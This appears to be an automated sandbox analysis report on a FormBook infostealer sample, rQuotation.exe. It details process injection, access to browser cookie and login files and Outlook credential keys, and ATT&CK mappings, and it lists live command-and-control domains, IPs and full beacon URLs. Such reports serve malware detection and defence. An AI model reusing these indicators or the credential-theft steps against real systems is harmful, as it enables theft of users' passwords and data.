              Source: C:\Users\user\Desktop\rQuotation.exeSection loaded: NULL target: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\rQuotation.exeSection loaded: NULL target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: NULL target: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: NULL target: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
              Modifies the context of a thread in another process (thread injection)
              Source: C:\Windows\SysWOW64\NETSTAT.EXEThread register set: target process: 8036Jump to behavior
              Queues an APC in another process (thread injection)
              Source: C:\Windows\SysWOW64\NETSTAT.EXEThread APC queued: target process: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeJump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"Jump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: gAmAZOKQyy.exe, 00000004.00000000.1946789112.0000000001800000.00000002.00000001.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000004.00000002.3572725865.0000000001800000.00000002.00000001.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3572908253.0000000001620000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: gAmAZOKQyy.exe, 00000004.00000000.1946789112.0000000001800000.00000002.00000001.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000004.00000002.3572725865.0000000001800000.00000002.00000001.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3572908253.0000000001620000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
              Source: gAmAZOKQyy.exe, 00000004.00000000.1946789112.0000000001800000.00000002.00000001.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000004.00000002.3572725865.0000000001800000.00000002.00000001.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3572908253.0000000001620000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
              Source: gAmAZOKQyy.exe, 00000004.00000000.1946789112.0000000001800000.00000002.00000001.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000004.00000002.3572725865.0000000001800000.00000002.00000001.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3572908253.0000000001620000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager

              Stealing of Sensitive Information

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 0.2.rQuotation.exe.840000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.2022208730.0000000001520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2021797759.0000000000841000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.3572173092.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.3574569506.00000000054D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.3572399532.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.3572338314.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3573072552.0000000002EA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2022713393.0000000001AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\SysWOW64\NETSTAT.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXEFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXEFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Windows\SysWOW64\NETSTAT.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

              Remote Access Functionality

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 0.2.rQuotation.exe.840000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.2022208730.0000000001520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2021797759.0000000000841000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.3572173092.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.3574569506.00000000054D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.3572399532.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.3572338314.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3573072552.0000000002EA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2022713393.0000000001AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
              DLL Side-Loading              		312
              Process Injection              		2
              Virtualization/Sandbox Evasion              		1
              OS Credential Dumping              		121
              Security Software Discovery              		Remote Services1
              Email Collection              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              Abuse Elevation Control Mechanism              		312
              Process Injection              		LSASS Memory2
              Virtualization/Sandbox Evasion              		Remote Desktop Protocol1
              Archive Collected Data              		3
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		Security Account Manager2
              Process Discovery              		SMB/Windows Admin Shares1
              Data from Local System              		4
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Abuse Elevation Control Mechanism              		NTDS1
              System Network Configuration Discovery              		Distributed Component Object ModelInput Capture4
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script4
              Obfuscated Files or Information              		LSA Secrets1
              System Network Connections Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
              Software Packing              		Cached Domain Credentials2
              File and Directory Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSync12
              System Information Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579601 Sample: rQuotation.exe Startdate: 23/12/2024 Architecture: WINDOWS Score: 100 24 www.llmsforrobot.xyz 2->24 26 www.furrcali.xyz 2->26 28 10 other IPs or domains 2->28 36 Suricata IDS alerts for network traffic 2->36 38 Antivirus / Scanner detection for submitted sample 2->38 40 Multi AV Scanner detection for submitted file 2->40 44 5 other signatures 2->44 9 rQuotation.exe 2->9         started        signatures3 42 Performs DNS queries to domains with low reputation 26->42 process4 signatures5 48 Maps a DLL or memory area into another process 9->48 12 gAmAZOKQyy.exe 9->12 injected process6 signatures7 50 Found direct / indirect Syscall (likely to bypass EDR) 12->50 15 NETSTAT.EXE 13 12->15         started        process8 signatures9 52 Tries to steal Mail credentials (via file / registry access) 15->52 54 Tries to harvest and steal browser information (history, passwords, etc) 15->54 56 Modifies the context of a thread in another process (thread injection) 15->56 58 3 other signatures 15->58 18 gAmAZOKQyy.exe 15->18 injected 22 firefox.exe 15->22         started        process10 dnsIp11 30 www.furrcali.xyz 103.106.67.112, 49969, 49974, 49980 VOYAGERNET-AS-APVoyagerInternetLtdNZ New Zealand 18->30 32 accusolution.pro 185.68.108.243, 50007, 50016, 50024 PROFESIONALHOSTINGES Spain 18->32 34 6 other IPs or domains 18->34 46 Found direct / indirect Syscall (likely to bypass EDR) 18->46 signatures12

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              rQuotation.exe71%ReversingLabsWin32.Backdoor.FormBook
              rQuotation.exe79%VirustotalBrowse
              rQuotation.exe100%AviraTR/Crypt.ZPACK.Gen
              rQuotation.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              No Antivirus matches

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              www.aihuzhibo.net
              		192.186.58.31
              		truetrue
                		unknown
                www.techforcreators.live
                		52.223.13.41
                		truetrue
                  		unknown
                  94950.bodis.com
                  		199.59.243.227
                  		truefalse
                    		high
                    www.seamarket.shop
                    		52.223.13.41
                    		truetrue
                      		unknown
                      www.yous.website
                      		209.74.79.40
                      		truetrue
                        		unknown
                        accusolution.pro
                        		185.68.108.243
                        		truetrue
                          		unknown
                          www.llmsforrobot.xyz
                          		192.30.252.154
                          		truetrue
                            		unknown
                            www.mirenzhibo.net
                            		202.95.11.110
                            		truetrue
                              		unknown
                              www.furrcali.xyz
                              		103.106.67.112
                              		truetrue
                                		unknown
                                www.sob.rip
                                		unknown
                                		unknownfalse
                                  		unknown
                                  www.amorinc.click
                                  		unknown
                                  		unknownfalse
                                    		unknown
                                    www.accusolution.pro
                                    		unknown
                                    		unknownfalse
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://www.yous.website/sd58/?4v7=qfAN8teQqWHl0pB75/wJ4PX285H5E3s25CgjwOd4PKd8zFqJMRX78aaJW2P6tpRkk2pp9lWkT1iA/dTcpEbuyLhsAas7SiW6kXoDkzQ8RaPJjUuFvtCyEK8=&pRel=chN0true
                                        		unknown
                                        http://www.mirenzhibo.net/qiu4/true
                                          		unknown
                                          http://www.llmsforrobot.xyz/033w/true
                                            		unknown
                                            http://www.accusolution.pro/45u5/?pRel=chN0&4v7=0TAGyGi/QqAief36fqQZkTt5+nwNOdjQfsW4ILLFJiz2YBVGcbvNqcBGTGc+pdHcbXHcTIwSr9BXUFYIju8DT0Mq2PAg2Di4D0yPeZ6V6HqzRoZnxJ6cd60=true
                                              		unknown
                                              http://www.aihuzhibo.net/gkfy/?4v7=07qYlGdy+WbqOk0cXAw1tsG+BYjZolWoNNS4BkQ+NnlSijGpnUaEsXAiEpeyBCiqWtAN48ClO71D0ZdXiZHmAUTm7Ixf7FFoVzGex49KD8u42uAoUmpEbrc=&pRel=chN0true
                                                		unknown
                                                http://www.accusolution.pro/45u5/true
                                                  		unknown
                                                  http://www.aihuzhibo.net/gkfy/true
                                                    		unknown
                                                    http://www.seamarket.shop/zsuo/?4v7=YAgg/ldayhOHmzfsjWLXvaG7J5REZu11MAD7iHXRrkYiTwNIRlKLNa8zNDpduzX56xW5NVkmDFlOQcyvict8ZBdH6DXl406L+zQHeArrLeiD5GII5G18dkg=&pRel=chN0true
                                                      		unknown
                                                      http://www.sob.rip/w4ic/?4v7=yS69adElfH9iGuX+6qGjDo1pzUaFwG2aAiZ0CSeLQ3WEURd5D9NqWLH4alYcst9SwKAkCKhjPGbctdXA/FIYLK0HEa0UfTU4rNsaCNMRH49YQwEuYtvnEXw=&pRel=chN0true
                                                        		unknown
                                                        http://www.furrcali.xyz/3dtl/true
                                                          		unknown

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://duckduckgo.com/chrome_newtabNETSTAT.EXE, 00000005.00000003.2205461163.0000000007DCA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.aihuzhibo.net/template/news/wandoujia/static/picture/anva-zilv.pngNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              		unknown
                                                              https://duckduckgo.com/ac/?q=NETSTAT.EXE, 00000005.00000003.2205461163.0000000007DCA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.mirenzhibo.net/uul/316.htmlNETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  		unknown
                                                                  http://www.mirenzhibo.net/aby/6355.htmlNETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    		unknown
                                                                    http://wws.changezhibo.top/def/94991.htmlNETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      		unknown
                                                                      http://www.aihuzhibo.net/template/news/wandoujia/static/js/bl.jsNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        		unknown
                                                                        http://wwb.dqzhbfahbcs.com/NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          		unknown
                                                                          http://wws.gzyuecong.cn/NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            		unknown
                                                                            http://www.aihuzhibo.net/template/news/wandoujia/static/js/broadcast.jsNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              		unknown
                                                                              http://www.schnitzelhaus.netNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                		unknown
                                                                                http://www.refcomp.netNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  http://www.mijuzhibo.cn/NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    http://www.mirenzhibo.net/de/24.htmlNETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      http://www.jindouzhibo.netNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        http://wwk.dqzhbfahbcs.com/hwj/953.htmlNETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          http://www.minizhibo.netNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            http://www.mirenzhibo.net/kwrn/8894.htmlNETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              http://wwa.xianjsk.cn/NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                http://www.mirenzhibo.net/c/7865.htmlNETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  http://wwf.lzyt.com.cn/h/725.htmlNETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    http://m.nichangzhibo.top/rngbj/261.htmlNETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      http://www.rsbi.netNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        http://wwb.xiaocaomeizhibo.com/NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          http://www.yaoyaozhibo.netNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            http://www.yunmengzhibo.netNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              http://www.aazhibo.net/bindingNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                http://www.autp.netNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  http://www.youtaozhibo.netNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    http://www.2023kuanmeiyingzhibo.comgAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      http://www.aihuzhibo.net/template/news/wandoujia/static/js/common.fe363a40.jsNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        http://m.anyinzhibo.top/NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          http://www.lovevintage.netNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            http://www.aihuzhibo.net/template/news/wandoujia/static/js/aggregatedentry.fe363a40.jsNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              http://www.minizhibo.comNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                http://www.mirenzhibo.net/ncf/32293.htmlNETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=NETSTAT.EXE, 00000005.00000003.2205461163.0000000007DCA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://www.xishizhibo.comNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      http://www.aihuzhibo.net/template/news/wandoujia/static/picture/qr-4_httpswww.wandoujia.comqr.pngNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        http://www.magicpage.netNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          http://www.aiyuezhibo.netNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            https://www.ecosia.org/newtab/NETSTAT.EXE, 00000005.00000003.2205461163.0000000007DCA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://wwa.wanrenmizhibo.com/NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                http://www.gesichtspflege.netNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                  		unknown
